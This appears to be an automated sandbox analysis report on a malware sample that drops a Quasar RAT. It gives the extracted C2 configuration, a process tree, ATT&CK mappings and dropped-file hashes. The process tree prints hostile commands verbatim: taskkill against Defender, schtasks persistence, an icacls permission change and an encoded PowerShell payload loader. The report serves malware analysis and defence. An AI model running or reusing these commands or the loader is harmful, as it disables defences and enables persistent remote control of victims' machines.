Analysis
-
max time kernel
1199s -
max time network
1171s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
-
submitted
23-05-2024 14:53
General
-
Target
lol.exe
-
Size
13.1MB
-
MD5
621d4a616715d165ed2c10e48e5fd94b
-
SHA1
7fabfdb5167e59d0442df460e1b236cb5bc75fbe
-
SHA256
7975eec3959bed57e86fb6fa917503a7a1242fdf589dde7600783fc37d3dfbde
-
SHA512
793302845e76e8cc03bd8281abad4db786f361e5c1a691462b40da11e8e7ac6210e0e9c21b41493dedffc6724af146ef70b9f8448d51dc860725364e14cba442
-
SSDEEP
196608:tbVYKe7PjQhn5EQ9hNQAYzA5k6cTWDn7JKObS09Vp7j1oTeBI7lm:pzuA5EWheYkv8LlCTe2s
Malware Config
Extracted
quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
-
encryption_key
E1BF1D99459F04CAF668F054744BC2C514B0A3D6
-
install_name
Romilyaa.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows 10 Boot
-
subdirectory
SubDir
Signatures
-
Modifies visibility of file extensions in Explorer 2 TTPs 1 IoCs
-
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Windows security bypass 2 TTPs 5 IoCs
-
Disables RegEdit via registry modification 1 IoCs
-
.NET Reactor proctector 35 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
-
Executes dropped EXE 11 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 6 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Modifies WinLogon 2 TTPs 2 IoCs
-
AutoIT Executable 10 IoCs
AutoIT scripts compiled to PE executables.
-
Drops file in System32 directory 12 IoCs
-
Drops file in Program Files directory 16 IoCs
-
Drops file in Windows directory 11 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 3 IoCs
-
Enumerates system info in registry 2 TTPs 6 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies Internet Explorer settings 1 TTPs 29 IoCs
-
Modifies registry class 21 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
-
Suspicious use of FindShellTrayWindow 43 IoCs
-
Suspicious use of SendNotifyMessage 30 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\lol.exe"C:\Users\Admin\AppData\Local\Temp\lol.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\loader.exe"C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K main.cmd4⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /f /im WindowsDefender.exe5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\Rover.exeRover.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\web.htm5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffee3963cb8,0x7ffee3963cc8,0x7ffee3963cd86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1924 /prefetch:26⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2364 /prefetch:36⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2568 /prefetch:86⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3108 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4872 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5220 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5188 /prefetch:16⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5056 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1916,6194785946017985888,3159568069448461546,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1824 /prefetch:26⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\helper.vbs"5⤵
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\spinner.gif5⤵
- Modifies Internet Explorer settings
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\scary.exescary.exe5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows 10 Boot" /sc ONLOGON /tr "C:\Program Files\SubDir\Romilyaa.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\the.exethe.exe5⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgAMQAwADAAMAAwACkACgAKACQARQYkBkIGKgYgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJABGBkUGSAYwBiwGIAA9ACAAJwBmAGkAbABlAC0AKgAuAHAAdQB0AGkAawAnAAoAJABFBkQGQQZfACMGLgZKBjEGIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQARQYkBkIGKgYgAC0ARgBpAGwAdABlAHIAIAAkAEYGRQZIBjAGLAYgAHwAIABTAG8AcgB0AC0ATwBiAGoAZQBjAHQAIABMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEYAaQByAHMAdAAgADEACgAKAGYAdQBuAGMAdABpAG8AbgAgAEEGQwZfACcGRAYqBjQGQQZKBjEGIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGQQYqBicGLQYsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiwACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAKAZKBicGRgYnBioGCgAgACAAIAAgACkACgAKACAAIAAgACAAJABFBjQGQQYxBiAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJABFBjQGQQYxBi4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkAEUGNAZBBjEGLgBQAGEAZABkAGkAbgBnACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFAAYQBkAGQAaQBuAGcATQBvAGQAZQBdADoAOgBQAEsAQwBTADcACgAKACAAIAAgACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYgAD0AIAAkAEUGNAZBBjEGLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQARQZBBioGJwYtBiwAIAAkAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBikACgAgACAAIAAgACQAKAZKBicGRgYnBioGXwBFBkEGQwZIBkMGKQZfACcGRAYqBjQGQQZKBjEGIAA9ACAAJABBBkMGXwAnBkQGKgY0BkEGSgYxBl8ALAZHBicGMgYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkACgGSgYnBkYGJwYqBiwAIAAwACwAIAAkACgGSgYnBkYGJwYqBi4ATABlAG4AZwB0AGgAKQAKAAkACgAgACAAIAAgAHIAZQB0AHUAcgBuACAAJAAoBkoGJwZGBicGKgZfAEUGQQZDBkgGQwYpBl8AJwZEBioGNAZBBkoGMQYKAH0ACgAKACQARQZBBioGJwYtBiAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4AEQAOAAsACAAMAB4ADIARgAsACAAMAB4ADEARgAsACAAMAB4ADYAQwAsACAAMAB4ADQARQAsACAAMAB4ADgAOAAsACAAMAB4ADQANQAsACAAMAB4AEQARAAsACAAMAB4ADEAQQAsACAAMAB4AEUARAAsACAAMAB4ADUAQwAsACAAMAB4ADQAQgAsACAAMAB4ADQAOQAsACAAMAB4ADQAOQAsACAAMAB4ADAAQwAsACAAMAB4ADMAQgAsACAAMAB4AEYAQQAsACAAMAB4AEEAMQAsACAAMAB4ADIANwAsACAAMAB4ADMARAAsACAAMAB4ADIAQQAsACAAMAB4AEIANQAsACAAMAB4AEMARAAsACAAMAB4ADIANwAsACAAMAB4ADQARAAsACAAMAB4ADAAQQAsACAAMAB4ADUAOQAsACAAMAB4ADUANwAsACAAMAB4AEMAQQAsACAAMAB4ADcAMAAsACAAMAB4AEEAQQAsACAAMAB4AEMAQgApAAoAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAAxAEMALAAgADAAeABBADMALAAgADAAeAAzADQALAAgADAAeABBADYALAAgADAAeAA4ADQALAAgADAAeABDAEMALAAgADAAeABBAEEALAAgADAAeABEADIALAAgADAAeABCADAALAAgADAAeABFAEUALAAgADAAeABBAEMALAAgADAAeABEADcALAAgADAAeABFAEIALAAgADAAeABGAEUALAAgADAAeAA4AEYALAAgADAAeAA5ADkAKQAKAAoAaQBmACAAKAAkAEUGRAZBBl8AIwYuBkoGMQYgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGIAA9ACAAJABFBkQGQQZfACMGLgZKBjEGLgBGAHUAbABsAE4AYQBtAGUACgAgACAAIAAgACQAKAYnBkoGKgYnBioGXwBFBjQGQQYxBikGIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAEUGMwYnBjEGXwAnBkQGRQZEBkEGKQA7AAoAIAAgACAAIAAkAEUGLQYqBkgGSQZfAEUGQQZDBkgGQwZfACcGRAYqBjQGQQZKBjEGIAA9ACAAQQZDBl8AJwZEBioGNAZBBkoGMQYgAC0ARQZBBioGJwYtBiAAJABFBkEGKgYnBi0GIAAtAEUGKgYsBkcGXwAnBkQGKgZHBkoGJgYpBiAAJABFBioGLAZHBl8AJwZEBioGRwZKBiYGKQYgAC0AKAZKBicGRgYnBioGIAAkACgGJwZKBioGJwYqBl8ARQY0BkEGMQYpBgoACgAgACAAIAAgACQAKgYsBkUGSgY5BiAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQARQYtBioGSAZJBl8ARQZBBkMGSAZDBl8AJwZEBioGNAZBBkoGMQYpACkAOwAKACAAIAAgACAAJABGBkIGNwYpBl8AJwZEBi8GLgZIBkQGIAA9ACAAJAAqBiwGRQZKBjkGLgBFAG4AdAByAHkAUABvAGkAbgB0ADsACgAgACAAIAAgACQARgZCBjcGKQZfACcGRAYvBi4GSAZEBi4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im taskmgr5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /im explorer5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\ac3.exeac3.exe5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
-
C:\Windows\system32\taskkill.exetaskkill /f /im fontdrvhost5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls c:\Windows\explorer.exe /grant Admin:(F,M)5⤵
- Modifies file permissions
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Desktop\lol_bc59c928-3fbb-4042-b511-92aab2495272\jaffa.exejaffa.exe5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\whkszztakb.exewhkszztakb.exe6⤵
- Modifies visibility of file extensions in Explorer
- Modifies visiblity of hidden/system files in Explorer
- Windows security bypass
- Disables RegEdit via registry modification
- Executes dropped EXE
- Windows security modification
- Enumerates connected drives
- Modifies WinLogon
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\vbsnimmo.exeC:\Windows\system32\vbsnimmo.exe7⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\ztmpxseewjrualr.exeztmpxseewjrualr.exe6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\vbsnimmo.exevbsnimmo.exe6⤵
- Executes dropped EXE
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\shilkiszkvwxo.exeshilkiszkvwxo.exe6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Windows\mydoc.rtf" /o ""6⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\timeout.exetimeout /t 155⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
Hide Artifacts
2Hidden Files and Directories
2Modify Registry
7Impair Defenses
2Disable or Modify Tools
2File and Directory Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLN.DOC.exeFilesize
512KB
MD5e2ad90709efbb1636477a5ae0031fb7d
SHA18b8cd5171f69639a1a21476b2a247f6d47ab3c6d
SHA25692d9b00b5d81dd79f4d7b25d7dc8394f984d5fd0f759f98289c46c92646443e6
SHA51211b3e17da8d959f98678426c49a32247367fd1f8940c98b82a1d381830945c80a2ffdff5e77f7a1c1d5fc8352cd5ad570d436d3ec76a1abce2bb3b7d94fec7f9
-
C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC.exeFilesize
512KB
MD57ef920960e591f853c6d615b550a5c59
SHA1f2befd62cefcb6f34412310a2a46eb538f830677
SHA256ad11c90f78ab94c3734ffadc1af35d031c2388999f0fa70370ba60e16f021700
SHA512eded95ba93eb1754cf7e812cf5cd039642d4b32c0f3db7681bca1969c6bb67268f9f03362f89fd0644dc68586978d46100e125047e629640fbb9fed7c616fb0f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5a8e4bf11ed97b6b312e938ca216cf30e
SHA1ff6b0b475e552dc08a2c81c9eb9230821d3c8290
SHA256296db8c9361efb62e23be1935fd172cfe9fbcd89a424f34f347ec3cc5ca5afad
SHA512ce1a05df2619af419ed3058dcbd7254c7159d333356d9f1d5e2591c19e17ab0ac9b6d3e625e36246ad187256bee75b7011370220ef127c4f1171879014d0dd76
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD523da8c216a7633c78c347cc80603cd99
SHA1a378873c9d3484e0c57c1cb6c6895f34fee0ea61
SHA25603dbdb03799f9e37c38f6d9d498ad09f7f0f9901430ff69d95aa26cae87504d3
SHA512d34ae684e8462e3f2aba2260f2649dee01b4e2138b50283513c8c19c47faf039701854e1a9cbf21d7a20c28a6306f953b58ffb9144ead067f5f73650a759ff17
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD58e9b04f859688caea71277ad90c05784
SHA161f861bb52e1159dac0fe2ea7ebb6d241cec35fb
SHA256f4a00458f241090924b199d07d45e2fa28d060b8ef01e0accb615425803ffbe8
SHA5120f5bca254bbfd1e0c4bdef8e935fcd4608d4539c38eb2913a2f06a0bde11e4be5b7de75c3a5fad67bad4df7dd6d119b0066254d8dabb9fc8efa0ea7a4b5cbf3c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD582dfa4c17f834d90fb97066dba6db9d1
SHA1f590d5994ef8327aacce1529083e21bc6f283ec8
SHA25653237c0d92e58b37e86704e33b8ec2836ab8f981967008dba98895404634f713
SHA5123ec77ca7721870e16959ce7744aef33d5e3631dc35cfcadfb9e33826b9768fa54db096878f458942f0a3f3fa2c47df8ff1887bbc5efa4771098605eb7878befe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD58cea3eefcf2cdf3b028908057cfca23f
SHA167b4c21a45aca00767851276ecd78a41ac276fbd
SHA256891ccd1a1bb6246c70d1da31fa349505aa416caec59a2dfb5a999bfe03b89c25
SHA512b76d7c2d3bd0adc139caf12527ac4c38c0563c465e3bae7c99a648589eada8f1a0a07c4ed0e2800a5e667f5f8c6df87dd6adcb24bf32763e183e176f9e86ca86
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5000f1cc39955756010dcdfe415aa9945
SHA13defcaa80a3784e3e0c56f2ed999861a20e748af
SHA256bad6ee04557534dd6efa2d44ac221c3da5e3ba9158e87dd4991b7dcf7bb5ed4c
SHA51265722b09d27eb176b79081ca5ebb59647cecc38069f7d37c199b50b9f5a26c850701a5e2644b77b267f1ae6255cf99472ab57179fe44afc910a8a69e19b799c3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD55b3e5a0c5b95d7fcf2d94de6d007674e
SHA1bf36de64190aec7c1adf4fffc36ae740aa6aee53
SHA25651f55e1aad9a0b3c268725805e8074a3d2262a412624c8ffb60703df0a769851
SHA512970e75a471d537aad5549a7c303fd25f77cda1021997930aa2c9d31034150f20d2d4df97b4ee37493504e8c0097b0eb51c5e194b74a87bd85c91bcd97fbbd1ee
-
C:\Users\Admin\AppData\Local\Temp\TCD6FCA.tmp\gb.xslFilesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
